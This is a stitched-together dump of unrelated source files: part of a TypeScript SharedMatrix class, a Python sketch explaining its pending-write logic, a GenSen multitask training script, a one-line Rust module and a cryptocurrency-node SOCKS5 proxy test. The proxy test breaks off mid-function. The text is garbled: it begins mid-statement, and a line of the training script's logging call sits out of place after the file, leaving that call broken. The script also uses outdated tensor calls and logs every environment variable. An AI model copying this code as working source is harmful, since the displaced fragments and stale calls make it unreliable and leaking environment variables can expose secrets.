no-null/no-null if (this.isAttached() && value !== undefined && value !== null) { this.sendSetCellOp( row, col, value, rowHandle, colHandle); } } } // Avoid reentrancy by raising change notifications after the op is queued. 
for (const consumer of this.consumers.values()) { consumer.cellsChanged(/* rowStart: */ 0, colStart, this.rowCount, colCount, this); } } protected snapshotCore(serializer: IFluidSerializer): ITree { const tree: ITree = { entries: [ { mode: FileMode.Directory, path: SnapshotPath.rows, type: TreeEntry.Tree, value: this.rows.snapshot(this.runtime, this.handle, serializer), }, { mode: FileMode.Directory, path: SnapshotPath.cols, type: TreeEntry.Tree, value: this.cols.snapshot(this.runtime, this.handle, serializer), }, serializeBlob( this.handle, SnapshotPath.cells, [ this.cells.snapshot(), this.pending.snapshot(), ], serializer), ], }; return tree; } /** * Advances the 'localSeq' counter for the cell data operation currently being queued. * * Do not use with 'submitColMessage()/submitRowMessage()' as these helpers + the MergeTree will * automatically advance 'localSeq'. */ private nextLocalSeq() { // Ideally, we would have a single 'localSeq' counter that is shared between both PermutationVectors // and the SharedMatrix's cell data. Instead, we externally bump each MergeTree's 'localSeq' counter // for SharedMatrix ops it's not aware of to keep them synchronized. (For cell data operations, we // need to bump both counters.) this.cols.getCollabWindow().localSeq++; return ++this.rows.getCollabWindow().localSeq; } protected submitLocalMessage(message: any, localOpMetadata?: any) { // TODO: Recommend moving this assertion into SharedObject // (See https://github.com/microsoft/FluidFramework/issues/2559) assert(this.isAttached() === true, 0x01d /* "Trying to submit message to runtime while detached!" */); super.submitLocalMessage(makeHandlesSerializable(message, this.serializer, this.handle), localOpMetadata); // Ensure that row/col 'localSeq' are synchronized (see 'nextLocalSeq()'). assert( this.rows.getCollabWindow().localSeq === this.cols.getCollabWindow().localSeq, 0x01e /* "Row and col collab window 'localSeq' desynchronized!" */, ); } protected didAttach() { // We've attached we need to start generating and sending ops. // so start collaboration and provide a default client id incase we are not connected if (this.isAttached()) { this.rows.startOrUpdateCollaboration(this.runtime.clientId ?? "attached"); this.cols.startOrUpdateCollaboration(this.runtime.clientId ?? "attached"); } } protected onConnect() { assert(this.rows.getCollabWindow().collaborating === this.cols.getCollabWindow().collaborating, 0x01f /* "Row and col collab window 'collaborating' status desynchronized!" */); // Update merge tree collaboration information with new client ID and then resend pending ops this.rows.startOrUpdateCollaboration(this.runtime.clientId as string); this.cols.startOrUpdateCollaboration(this.runtime.clientId as string); } protected reSubmitCore(content: any, localOpMetadata: unknown) { switch (content.target) { case SnapshotPath.cols: this.submitColMessage(this.cols.regeneratePendingOp( content as IMergeTreeOp, localOpMetadata as SegmentGroup | SegmentGroup[])); break; case SnapshotPath.rows: this.submitRowMessage(this.rows.regeneratePendingOp( content as IMergeTreeOp, localOpMetadata as SegmentGroup | SegmentGroup[])); break; default: { assert(content.type === MatrixOp.set, 0x020 /* "Unknown SharedMatrix 'op' type." 
*/); const setOp = content as ISetOp<T>; const { rowHandle, colHandle, localSeq } = localOpMetadata as ISetOpMetadata; // If there are more pending local writes to the same row/col handle, it is important // to skip resubmitting this op since it is possible the row/col handle has been recycled // and now refers to a different position than when this op was originally submitted. if (this.isLatestPendingWrite(rowHandle, colHandle, localSeq)) { const row = this.rows.handleToPosition(rowHandle, localSeq); const col = this.cols.handleToPosition(colHandle, localSeq); if (row >= 0 && col >= 0) { this.sendSetCellOp( row, col, setOp.value, rowHandle, colHandle, localSeq, ); } } break; } } } protected onDisconnect() { debug(`${this.id} is now disconnected`); } /** * {@inheritDoc @fluidframework/shared-object-base#SharedObject.loadCore} */ protected async loadCore(storage: IChannelStorageService) { try { await this.rows.load( this.runtime, new ObjectStoragePartition(storage, SnapshotPath.rows), this.serializer); await this.cols.load( this.runtime, new ObjectStoragePartition(storage, SnapshotPath.cols), this.serializer); const [cellData, pendingCliSeqData] = await deserializeBlob(storage, SnapshotPath.cells, this.serializer); this.cells = SparseArray2D.load(cellData); this.pending = SparseArray2D.load(pendingCliSeqData); } catch (error) { this.logger.sendErrorEvent({ eventName: "MatrixLoadFailed" }, error); } } protected processCore(rawMessage: ISequencedDocumentMessage, local: boolean, localOpMetadata: unknown) { const msg = parseHandles(rawMessage, this.serializer); const contents = msg.contents; switch (contents.target) { case SnapshotPath.cols: this.cols.applyMsg(msg); break; case SnapshotPath.rows: this.rows.applyMsg(msg); break; default: { assert(contents.type === MatrixOp.set, 0x021 /* "SharedMatrix message contents have unexpected type!" */); const { referenceSequenceNumber: refSeq, clientId } = rawMessage; const { row, col } = contents; if (local) { // We are receiving the ACK for a local pending set operation. const { rowHandle, colHandle, localSeq } = localOpMetadata as ISetOpMetadata; // If this is the most recent write to the cell by the local client, remove our // entry from 'pendingCliSeqs' to resume allowing remote writes. if (this.isLatestPendingWrite(rowHandle, colHandle, localSeq)) { this.pending.setCell(rowHandle, colHandle, undefined); } } else { const rowClientId = this.rows.getOrAddShortClientId(clientId); const adjustedRow = this.rows.adjustPosition(row, refSeq, rowClientId); if (adjustedRow !== undefined) { const colClientId = this.cols.getOrAddShortClientId(clientId); const adjustedCol = this.cols.adjustPosition(col, refSeq, colClientId); if (adjustedCol !== undefined) { const rowHandle = this.rows.getAllocatedHandle(adjustedRow); const colHandle = this.cols.getAllocatedHandle(adjustedCol); assert(isHandleValid(rowHandle) && isHandleValid(colHandle), 0x022 /* "SharedMatrix row and/or col handles are invalid!" */); // If there is a pending (unACKed) local write to the same cell, skip the current op // since it "happened before" the pending write. 
if (this.pending.getCell(rowHandle, colHandle) === undefined) { const { value } = contents; this.cells.setCell(rowHandle, colHandle, value); for (const consumer of this.consumers.values()) { consumer.cellsChanged(adjustedRow, adjustedCol, 1, 1, this); } } } } } } } } protected registerCore() { this.rows.startOrUpdateCollaboration(this.runtime.clientId, 0); this.cols.startOrUpdateCollaboration(this.runtime.clientId, 0); } // Invoked by PermutationVector to notify IMatrixConsumers of row insertion/deletions. private readonly onRowDelta = (position: number, removedCount: number, insertedCount: number) => { for (const consumer of this.consumers) { consumer.rowsChanged(position, removedCount, insertedCount, this); } }; // Invoked by PermutationVector to notify IMatrixConsumers of col insertion/deletions. private readonly onColDelta = (position: number, removedCount: number, insertedCount: number) => { for (const consumer of this.consumers) { consumer.colsChanged(position, removedCount, insertedCount, this); } }; private readonly onRowHandlesRecycled = (rowHandles: Handle[]) => { for (const rowHandle of rowHandles) { this.cells.clearRows(/* rowStart: */ rowHandle, /* rowCount: */ 1); this.pending.clearRows(/* rowStart: */ rowHandle, /* rowCount: */ 1); } }; private readonly onColHandlesRecycled = (colHandles: Handle[]) => { for (const colHandle of colHandles) { this.cells.clearCols(/* colStart: */ colHandle, /* colCount: */ 1); this.pending.clearCols(/* colStart: */ colHandle, /* colCount: */ 1); } }; /** * Returns true if the latest pending write to the cell indicated by the given row/col handles * matches the given 'localSeq'. * * A return value of `true` indicates that there are no later local operations queued that will * clobber the write op at the given 'localSeq'. This includes later ops that overwrite the cell * with a different value as well as row/col removals that might recycled the given row/col handles. */ private isLatestPendingWrite(rowHandle: Handle, colHandle: Handle, localSeq: number) { // eslint-disable-next-line @typescript-eslint/no-non-null-assertion const pendingLocalSeq = this.pending.getCell(rowHandle, colHandle)!; // Note while we're awaiting the ACK for a local set, it's possible for the row/col to be // locally removed and the row/col handles recycled. If this happens, the pendingLocalSeq will // be 'undefined' or > 'localSeq'. assert(!(pendingLocalSeq < localSeq), // eslint-disable-next-line max-len 0x023 /* "The 'localSeq' of pending write (if any) must be <= the localSeq of the currently processed op." */); // If this is the most recent write to the cell by the local client, the stored localSeq // will be an exact match for the given 'localSeq'. return pendingLocalSeq === localSeq; } public toString() { let s = `client:${this.runtime.clientId}\nrows: ${this.rows.toString()}\ncols: ${this.cols.toString()}\n\n`; for (let r = 0; r < this.rowCount; r++) { s += ` [`; for (let c = 0; c < this.colCount; c++) { if (c > 0) { s += ", "; } s += `${JSON.stringify(this.getCell(r, c))}`; } s += "]\n"; } return `${s}\n`; } protected applyStashedOp() { throw new Error("not implemented"); } }
SharedMatrix
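The pending-write tracking above can be read independently of the Fluid Framework types: each local set records its localSeq under (rowHandle, colHandle), only the ACK of the latest pending write clears the entry, and remote writes are skipped while an entry exists. A minimal Python sketch of that bookkeeping, with invented names (PendingWrites, set_local, ack, apply_remote) that are not part of the SharedMatrix API:

class PendingWrites:
    """Toy model of the 'latest pending local write wins' rule used above."""

    def __init__(self):
        self.cells = {}     # (row_handle, col_handle) -> current value
        self.pending = {}   # (row_handle, col_handle) -> localSeq of newest unACKed local write

    def set_local(self, key, value, local_seq):
        # A newer local write supersedes any older pending write to the same cell.
        self.cells[key] = value
        self.pending[key] = local_seq

    def ack(self, key, local_seq):
        # Only the ACK of the latest pending write re-opens the cell to remote writes.
        if self.pending.get(key) == local_seq:
            del self.pending[key]

    def apply_remote(self, key, value):
        # A remote write "happened before" any pending local write, so it is skipped.
        if key not in self.pending:
            self.cells[key] = value

m = PendingWrites()
m.set_local((0, 0), "local", local_seq=7)
m.apply_remote((0, 0), "remote")   # ignored: local write still pending
m.ack((0, 0), local_seq=7)
m.apply_remote((0, 0), "remote")   # applied: no pending local write remains
assert m.cells[(0, 0)] == "remote"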
gensen_train.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. """ The GenSen training process follows these steps: 1. Create or load the dataset vocabulary 2. Train on the training dataset for each batch epoch (batch size = 48 updates) 3. Evaluate on the validation dataset every 10 epochs 4. Find the local minimum of the validation loss 5. Save the best model and stop the training process AzureML provides AI Compute to train the model and track the performance. This training process runs on GPU only. """ import argparse import json import logging import os import time import horovod.torch as hvd import mlflow import numpy as np import torch import torch.backends.cudnn as cudnn import torch.nn as nn import torch.nn.functional as f import torch.optim as optim from utils_nlp.models.gensen.multi_task_model import MultitaskModel from utils_nlp.models.gensen.utils import ( BufferedDataIterator, NLIIterator, compute_validation_loss, ) cudnn.benchmark = True logger = logging.getLogger(__name__) hvd.init() if torch.cuda.is_available(): # Horovod: pin GPU to local rank. torch.cuda.set_device(hvd.local_rank()) def metric_average(value, name): """ Average the validation loss across Horovod worker nodes. :param value: Local metric value. :param name: Name used for the Horovod allreduce operation. :return: Metric value averaged across all workers. """ tensor = torch.tensor(value) avg_tensor = hvd.allreduce(tensor, name=name) return avg_tensor.item() def setup_horovod(model, learning_rate): """ Setup for Horovod usage. Args: model(MultitaskModel): The MultitaskModel object. learning_rate(float): Learning rate for the model. Returns: hvd.DistributedOptimizer: Optimizer to use for computing gradients and applying updates. """ # Horovod: scale learning rate by the number of GPUs. optimizer = optim.Adam(model.parameters(), lr=learning_rate * hvd.size()) # Horovod: broadcast parameters & optimizer state. hvd.broadcast_parameters(model.state_dict(), root_rank=0) hvd.broadcast_optimizer_state(optimizer, root_rank=0) # Horovod: (optional) compression algorithm. compression = hvd.Compression.fp16 # Horovod: wrap optimizer with DistributedOptimizer. 
optimizer = hvd.DistributedOptimizer( optimizer, named_parameters=model.named_parameters(), compression=compression, ) return optimizer def setup_logging(config): logging.basicConfig( level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s", filename="log/%s" % (config["data"]["task"]), filemode="w", ) console = logging.StreamHandler() console.setLevel(logging.INFO) formatter = logging.Formatter("%(asctime)s - %(levelname)s - %(message)s") console.setFormatter(formatter) logging.getLogger("").addHandler(console) def log_config(config): logging.info("Model Parameters : ") logging.info("Task : %s " % (config["data"]["task"])) logging.info( "Source Word Embedding Dim : %s" % (config["model"]["dim_word_src"]) ) logging.info( "Target Word Embedding Dim : %s" % (config["model"]["dim_word_trg"]) ) logging.info("Source RNN Hidden Dim : %s" % (config["model"]["dim_src"])) logging.info("Target RNN Hidden Dim : %s" % (config["model"]["dim_trg"])) logging.info( "Source RNN Bidirectional : %s" % (config["model"]["bidirectional"]) ) logging.info("Batch Size : %d " % (config["training"]["batch_size"])) logging.info("Optimizer : %s " % (config["training"]["optimizer"])) logging.info("Learning Rate : %f " % (config["training"]["lrate"])) def evaluate( config, train_iterator, model, loss_criterion, monitor_epoch, min_val_loss, min_val_loss_epoch, save_dir, starting_time, model_state, max_epoch, ): """ Function to validate the model. Args: max_epoch(int): Limit training to specified number of epochs. model_state(dict): Saved model weights. config(dict): Config object. train_iterator(BufferedDataIterator): BufferedDataIterator object. model(MultitaskModel): The MultitaskModel object. loss_criterion(nn.CrossEntropyLoss): Cross entropy loss. monitor_epoch(int): Current epoch count. min_val_loss(float): Minimum validation loss min_val_loss_epoch(int): Epoch where the minimum validation loss was seen. save_dir(str): Directory path to save the model dictionary. starting_time(time.Time): Starting time of the training. Returns: bool: Whether to continue training or not. """ break_flag = 0 for task_idx, task in enumerate(train_iterator.tasknames): if "skipthought" in task: continue validation_loss = compute_validation_loss( config, model, train_iterator, loss_criterion, task_idx, lowercase=True, ) validation_loss = metric_average(validation_loss, "val_loss") logging.info("%s Validation Loss : %.3f" % (task, validation_loss)) # Horovod: print output only on first rank. if hvd.rank() == 0: # log the best val accuracy to AML run logging.info( "Best Validation Loss: {}".format(np.float(validation_loss)) ) # If the validation loss is small enough, and it starts to go up. # Should stop training. # Small is defined by the number of epochs it lasts. if validation_loss < min_val_loss: min_val_loss = validation_loss min_val_loss_epoch = monitor_epoch model_state = model.state_dict() logging.info( "Monitor epoch: %d Validation Loss: %.3f Min Validation Epoch: " "%d Loss : %.3f " % ( monitor_epoch, validation_loss, min_val_loss_epoch, min_val_loss, ) ) if (monitor_epoch - min_val_loss_epoch) > config["training"][ "stop_patience" ] or (max_epoch is not None and monitor_epoch >= max_epoch): logging.info("Saving model ...") # Save the name with validation loss. torch.save( model_state, open(os.path.join(save_dir, "best_model.model"), "wb"), ) # Let the training end. 
break_flag = 1 break if break_flag == 1: logging.info("##### Training stopped at ##### %f" % min_val_loss) logging.info( "##### Training Time ##### %f seconds" % (time.time() - starting_time) ) return True, min_val_loss_epoch, min_val_loss, model_state else: return False, min_val_loss_epoch, min_val_loss, model_state def evaluate_nli(nli_iterator, model, batch_size, n_gpus): """ Args: nli_iterator(NLIIterator): NLIIterator object. model(MultitaskModel): Multitask model object. batch_size(int): Batch size. n_gpus(int): Number of gpus """ n_correct = 0.0 n_wrong = 0.0 for j in range(0, len(nli_iterator.dev_lines), batch_size * n_gpus): minibatch = nli_iterator.get_parallel_minibatch( j, batch_size * n_gpus, "dev" ) class_logits = model( minibatch, -1, return_hidden=False, paired_trg=None ) class_preds = ( f.softmax(class_logits).data.cpu().numpy().argmax(axis=-1) ) labels = minibatch["labels"].data.cpu().numpy() for pred, label in zip(class_preds, labels): if pred == label: n_correct += 1.0 else: n_wrong += 1.0 logging.info("NLI Dev Acc : %.5f" % (n_correct / (n_correct + n_wrong))) n_correct = 0.0 n_wrong = 0.0 for j in range(0, len(nli_iterator.test_lines), batch_size * n_gpus): minibatch = nli_iterator.get_parallel_minibatch( j, batch_size * n_gpus, "test" ) class_logits = model( minibatch, -1, return_hidden=False, paired_trg=None ) class_preds = ( f.softmax(class_logits).data.cpu().numpy().argmax(axis=-1) ) labels = minibatch["labels"].data.cpu().numpy() for pred, label in zip(class_preds, labels): if pred == label: n_correct += 1.0 else: n_wrong += 1.0 logging.info("NLI Test Acc : %.5f" % (n_correct / (n_correct + n_wrong))) logging.info("******************************************************") def train(config, data_folder, learning_rate=0.0001, max_epoch=None): """ Train the Gensen model. Args: max_epoch(int): Limit training to specified number of epochs. config(dict): Loaded json file as a python object. data_folder(str): Path to the folder containing the data. learning_rate(float): Learning rate for the model. 
""" owd = os.getcwd() os.chdir(data_folder) try: with mlflow.start_run(): save_dir = config["data"]["save_dir"] if not os.path.exists("./log"): os.makedirs("./log") os.makedirs(save_dir, exist_ok=True) setup_logging(config) batch_size = config["training"]["batch_size"] src_vocab_size = config["model"]["n_words_src"] trg_vocab_size = config["model"]["n_words_trg"] max_len_src = config["data"]["max_src_length"] max_len_trg = config["data"]["max_trg_length"] model_state = {} train_src = [item["train_src"] for item in config["data"]["paths"]] train_trg = [item["train_trg"] for item in config["data"]["paths"]] tasknames = [item["taskname"] for item in config["data"]["paths"]] # Keep track of indicies to train forward and backward jointly if ( "skipthought_next" in tasknames and "skipthought_previous" in tasknames ): skipthought_idx = tasknames.index("skipthought_next") skipthought_backward_idx = tasknames.index( "skipthought_previous" ) paired_tasks = { skipthought_idx: skipthought_backward_idx, skipthought_backward_idx: skipthought_idx, } else: paired_tasks = None skipthought_idx = None skipthought_backward_idx = None train_iterator = BufferedDataIterator( train_src, train_trg, src_vocab_size, trg_vocab_size, tasknames, save_dir, buffer_size=1e6, lowercase=True, seed=(hvd.rank() + 1) * 12345, ) nli_iterator = NLIIterator( train=config["data"]["nli_train"], dev=config["data"]["nli_dev"], test=config["data"]["nli_test"], vocab_size=-1, vocab=os.path.join(save_dir, "src_vocab.pkl"), seed=(hvd.rank() + 1) * 12345, ) src_vocab_size = len(train_iterator.src[0]["word2id"]) trg_vocab_size = len(train_iterator.trg[0]["word2id"]) # Logging set up. logging.info("Finished creating iterator ...") log_config(config) logging.info( "Found %d words in source : " % (len(train_iterator.src[0]["id2word"])) ) for idx, taskname in enumerate(tasknames): logging.info( "Found %d target words in task %s " % (len(train_iterator.trg[idx]["id2word"]), taskname) ) logging.info("Found %d words in src " % src_vocab_size) logging.info("Found %d words in trg " % trg_vocab_size) weight_mask = torch.ones(trg_vocab_size).cuda() weight_mask[train_iterator.trg[0]["word2id"]["<pad>"]] = 0 loss_criterion = nn.CrossEntropyLoss(weight=weight_mask).cuda() nli_criterion = nn.CrossEntropyLoss().cuda() model = MultitaskModel( src_emb_dim=config["model"]["dim_word_src"], trg_emb_dim=config["model"]["dim_word_trg"], src_vocab_size=src_vocab_size, trg_vocab_size=trg_vocab_size, src_hidden_dim=config["model"]["dim_src"], trg_hidden_dim=config["model"]["dim_trg"], bidirectional=config["model"]["bidirectional"], pad_token_src=train_iterator.src[0]["word2id"]["<pad>"], pad_token_trg=train_iterator.trg[0]["word2id"]["<pad>"], nlayers_src=config["model"]["n_layers_src"], dropout=config["model"]["dropout"], num_tasks=len(train_iterator.src), paired_tasks=paired_tasks, ).cuda() optimizer = setup_horovod(model, learning_rate=learning_rate) logging.info(model) n_gpus = config["training"]["n_gpus"] model = torch.nn.DataParallel(model, device_ids=range(n_gpus)) task_losses = [[] for _ in tasknames] task_idxs = [0 for _ in tasknames] nli_losses = [] updates = 0 nli_ctr = 0 nli_epoch = 0 monitor_epoch = 0 nli_mbatch_ctr = 0 mbatch_times = [] min_val_loss = 10000000 min_val_loss_epoch = -1 rng_num_tasks = ( len(tasknames) - 1 if paired_tasks else len(tasknames) ) logging.info("OS Environ: \n {} \n\n".format(os.environ)) mlflow.log_param("learning_rate", learning_rate) logging.info("Commencing Training ...") start = time.time() while True: batch_start_time = 
time.time() # Train NLI once every 10 minibatches of other tasks if nli_ctr % 10 == 0: minibatch = nli_iterator.get_parallel_minibatch( nli_mbatch_ctr, batch_size * n_gpus ) optimizer.zero_grad() class_logits = model( minibatch, -1, return_hidden=False, paired_trg=None ) loss = nli_criterion( class_logits.contiguous().view( -1, class_logits.size(1) ), minibatch["labels"].contiguous().view(-1), ) # nli_losses.append(loss.data[0]) nli_losses.append(loss.item()) loss.backward() torch.nn.utils.clip_grad_norm(model.parameters(), 1.0) optimizer.step() nli_mbatch_ctr += batch_size * n_gpus if nli_mbatch_ctr >= len(nli_iterator.train_lines): nli_mbatch_ctr = 0 nli_epoch += 1 else: # Sample a random task task_idx = np.random.randint(low=0, high=rng_num_tasks) # Get a minibatch corresponding to the sampled task minibatch = train_iterator.get_parallel_minibatch( task_idx, task_idxs[task_idx], batch_size * n_gpus, max_len_src, max_len_trg, ) """Increment pointer into task and if current buffer is exhausted, fetch new buffer. """ task_idxs[task_idx] += batch_size * n_gpus if task_idxs[task_idx] >= train_iterator.buffer_size: train_iterator.fetch_buffer(task_idx) task_idxs[task_idx] = 0 if task_idx == skipthought_idx: minibatch_back = train_iterator.get_parallel_minibatch( skipthought_backward_idx, task_idxs[skipthought_backward_idx], batch_size * n_gpus, max_len_src, max_len_trg, ) task_idxs[skipthought_backward_idx] += ( batch_size * n_gpus ) if ( task_idxs[skipthought_backward_idx] >= train_iterator.buffer_size ): train_iterator.fetch_buffer( skipthought_backward_idx ) task_idxs[skipthought_backward_idx] = 0 optimizer.zero_grad() decoder_logit, decoder_logit_2 = model( minibatch, task_idx, paired_trg=minibatch_back["input_trg"], ) loss_f = loss_criterion( decoder_logit.contiguous().view( -1, decoder_logit.size(2) ), minibatch["output_trg"].contiguous().view(-1), ) loss_b = loss_criterion( decoder_logit_2.contiguous().view( -1, decoder_logit_2.size(2) ), minibatch_back["output_trg"].contiguous().view(-1), ) task_losses[task_idx].append(loss_f.data[0]) task_losses[skipthought_backward_idx].append( loss_b.data[0] ) loss = loss_f + loss_b else: optimizer.zero_grad() decoder_logit = model(minibatch, task_idx) loss = loss_criterion( decoder_logit.contiguous().view( -1, decoder_logit.size(2) ), minibatch["output_trg"].contiguous().view(-1), ) task_losses[task_idx].append(loss.item()) loss.backward() # For distributed optimizer need to sync before gradient # clipping. optimizer.synchronize() torch.nn.utils.clip_grad_norm(model.parameters(), 1.0) optimizer.step() end = time.time() mbatch_times.append(end - batch_start_time) # Validations if ( updates % config["management"]["monitor_loss"] == 0 and updates != 0 ): monitor_epoch += 1 for idx, task in enumerate(tasknames): logging.info( "Seq2Seq Examples Processed : %d %s Loss : %.5f Num %s " "minibatches : %d" % ( updates, task, np.mean(task_losses[idx]),
) ) mlflow.log_metric( "validation_loss", np.mean(task_losses[idx]), step=monitor_epoch, ) logging.info( "Round: %d NLI Epoch : %d NLI Examples Processed : %d NLI " "Loss : %.5f " % ( nli_ctr, nli_epoch, nli_mbatch_ctr, np.mean(nli_losses), ) ) mlflow.log_metric( "nli_loss", np.mean(nli_losses), step=nli_epoch ) logging.info( "Average time per minibatch : %.5f" % (np.mean(mbatch_times)) ) mlflow.log_metric( "minibatch_avg_duration", np.mean(mbatch_times) ) task_losses = [[] for _ in tasknames] mbatch_times = [] nli_losses = [] # For validate and break if done. logging.info("############################") logging.info("##### Evaluating model #####") logging.info("############################") training_complete, min_val_loss_epoch, min_val_loss, model_state = evaluate( config=config, train_iterator=train_iterator, model=model, loss_criterion=loss_criterion, monitor_epoch=monitor_epoch, min_val_loss=min_val_loss, min_val_loss_epoch=min_val_loss_epoch, save_dir=save_dir, starting_time=start, model_state=model_state, max_epoch=max_epoch, ) if training_complete: mlflow.log_metric("min_val_loss", float(min_val_loss)) mlflow.log_metric("learning_rate", learning_rate) break logging.info("Evaluating on NLI") evaluate_nli( nli_iterator=nli_iterator, model=model, n_gpus=n_gpus, batch_size=batch_size, ) updates += batch_size * n_gpus nli_ctr += 1 logging.info("Updates: %d" % updates) finally: os.chdir(owd) def read_config(json_file): """Read JSON config.""" json_object = json.load(open(json_file, "r", encoding="utf-8")) return json_object if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--config", help="path to json config", required=True) parser.add_argument("--data_folder", type=str, help="data folder") # Add learning rate to tune model. parser.add_argument( "--learning_rate", type=float, default=0.0001, help="learning rate" ) parser.add_argument( "--max_epoch", type=int, default=None, help="Limit training to specified number of epochs.", ) args = parser.parse_args() data_path = args.data_folder lr = args.learning_rate config_file_path = args.config max_epoch = args.max_epoch config_obj = read_config(config_file_path) train(config_obj, data_path, lr, max_epoch)
task, len(task_losses[idx]),
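The evaluate() logic above stops training once the validation loss has not improved for more than config["training"]["stop_patience"] epochs, or once max_epoch is reached. A stripped-down sketch of that early-stopping rule, with invented names and none of the Horovod/mlflow plumbing:

def train_with_patience(validate, stop_patience, max_epoch=None):
    """Run epochs until the validation loss stalls for more than stop_patience epochs."""
    min_val_loss = float("inf")
    min_val_loss_epoch = -1
    epoch = 0
    while True:
        epoch += 1
        val_loss = validate(epoch)
        if val_loss < min_val_loss:
            min_val_loss = val_loss
            min_val_loss_epoch = epoch
        out_of_patience = (epoch - min_val_loss_epoch) > stop_patience
        hit_epoch_limit = max_epoch is not None and epoch >= max_epoch
        if out_of_patience or hit_epoch_limit:
            return min_val_loss, min_val_loss_epoch

# Loss improves until epoch 4, then plateaus; the loop stops once patience is exhausted.
losses = {1: 1.0, 2: 0.8, 3: 0.6, 4: 0.5}
assert train_with_patience(lambda e: losses.get(e, 0.55), stop_patience=3) == (0.5, 4)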
mod.rs
pub mod cookie;
feature_proxy.py
#!/usr/bin/env python3 # Copyright (c) 2015-2017 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test bitcoind with different proxy configurations. Test plan: - Start nesteggd nodes with different proxy configurations - Use addnode to initiate connections - Verify that proxies are connected to, and the right connection command is given - Proxy configurations to test on the nesteggd side: - `-proxy` (proxy everything) - `-onion` (proxy just onions) - `-proxyrandomize` Circuit randomization - Proxy configurations to test on the proxy side: - support no authentication (other proxy) - support no authentication + user/pass authentication (Tor) - proxy on IPv6 - Create various proxies (as threads) - Create nesteggds that connect to them - Manipulate the nesteggds using addnode (onetry) and observe effects addnode connect to IPv4 addnode connect to IPv6 addnode connect to onion addnode connect to generic DNS name """ import socket import os from test_framework.socks5 import Socks5Configuration, Socks5Command, Socks5Server, AddressType from test_framework.test_framework import PivxTestFramework from test_framework.util import ( PORT_MIN, PORT_RANGE, assert_equal, ) from test_framework.netutil import test_ipv6_local RANGE_BEGIN = PORT_MIN + 2 * PORT_RANGE # Start after p2p and rpc ports class ProxyTest(PivxTestFramework): def set_test_params(self): self.num_nodes = 4 def setup_nodes(self): self.have_ipv6 = test_ipv6_local() # Create two proxies on different ports # ... one unauthenticated self.conf1 = Socks5Configuration() self.conf1.addr = ('127.0.0.1', RANGE_BEGIN + (os.getpid() % 1000)) self.conf1.unauth = True self.conf1.auth = False # ... one supporting authenticated and unauthenticated (Tor) self.conf2 = Socks5Configuration() self.conf2.addr = ('127.0.0.1', RANGE_BEGIN + 1000 + (os.getpid() % 1000)) self.conf2.unauth = True self.conf2.auth = True if self.have_ipv6: # ... 
one on IPv6 with similar configuration self.conf3 = Socks5Configuration() self.conf3.af = socket.AF_INET6 self.conf3.addr = ('::1', RANGE_BEGIN + 2000 + (os.getpid() % 1000)) self.conf3.unauth = True self.conf3.auth = True else: self.log.warning("Testing without local IPv6 support") self.serv1 = Socks5Server(self.conf1) self.serv1.start() self.serv2 = Socks5Server(self.conf2) self.serv2.start() if self.have_ipv6: self.serv3 = Socks5Server(self.conf3) self.serv3.start() # Note: proxies are not used to connect to local nodes # this is because the proxy to use is based on CService.GetNetwork(), which return NET_UNROUTABLE for localhost args = [ ['-listen', '-proxy=%s:%i' % (self.conf1.addr),'-proxyrandomize=1'], ['-listen', '-proxy=%s:%i' % (self.conf1.addr),'-onion=%s:%i' % (self.conf2.addr),'-proxyrandomize=0'], ['-listen', '-proxy=%s:%i' % (self.conf2.addr),'-proxyrandomize=1'], [] ] if self.have_ipv6: args[3] = ['-listen', '-proxy=[%s]:%i' % (self.conf3.addr),'-proxyrandomize=0', '-noonion'] self.add_nodes(self.num_nodes, extra_args=args) self.start_nodes() def node_test(self, node, proxies, auth, test_onion=True): rv = [] # Test: outgoing IPv4 connection through node node.addnode("15.61.23.23:1234", "onetry") cmd = proxies[0].queue.get() assert(isinstance(cmd, Socks5Command)) # Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6 assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, b"15.61.23.23") assert_equal(cmd.port, 1234) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) if self.have_ipv6: # Test: outgoing IPv6 connection through node node.addnode("[1233:3432:2434:2343:3234:2345:6546:4534]:5443", "onetry") cmd = proxies[1].queue.get() assert(isinstance(cmd, Socks5Command)) # Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6 assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, b"1233:3432:2434:2343:3234:2345:6546:4534") assert_equal(cmd.port, 5443) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) if test_onion: # Test: outgoing onion connection through node node.addnode("bitcoinostk4e4re.onion:8333", "onetry") cmd = proxies[2].queue.get() assert(isinstance(cmd, Socks5Command)) assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, b"bitcoinostk4e4re.onion") assert_equal(cmd.port, 8333) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) # Test: outgoing DNS name connection through node node.addnode("node.noumenon:8333", "onetry") cmd = proxies[3].queue.get() assert(isinstance(cmd, Socks5Command)) assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, b"node.noumenon") assert_equal(cmd.port, 8333) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) return rv def run_test(self): # basic -proxy self.node_test(self.nodes[0], [self.serv1, self.serv1, self.serv1, self.serv1], False) # -proxy plus -onion self.node_test(self.nodes[1], [self.serv1, self.serv1, self.serv2, self.serv1], False) # -proxy plus -onion, -proxyrandomize rv = self.node_test(self.nodes[2], [self.serv2, self.serv2, self.serv2, self.serv2], True) # Check that credentials as used for -proxyrandomize connections are unique credentials = set((x.username,x.password) for x in rv) assert_equal(len(credentials), len(rv)) if self.have_ipv6: # proxy on IPv6 localhost 
self.node_test(self.nodes[3], [self.serv3, self.serv3, self.serv3, self.serv3], False, False) def networks_dict(d):
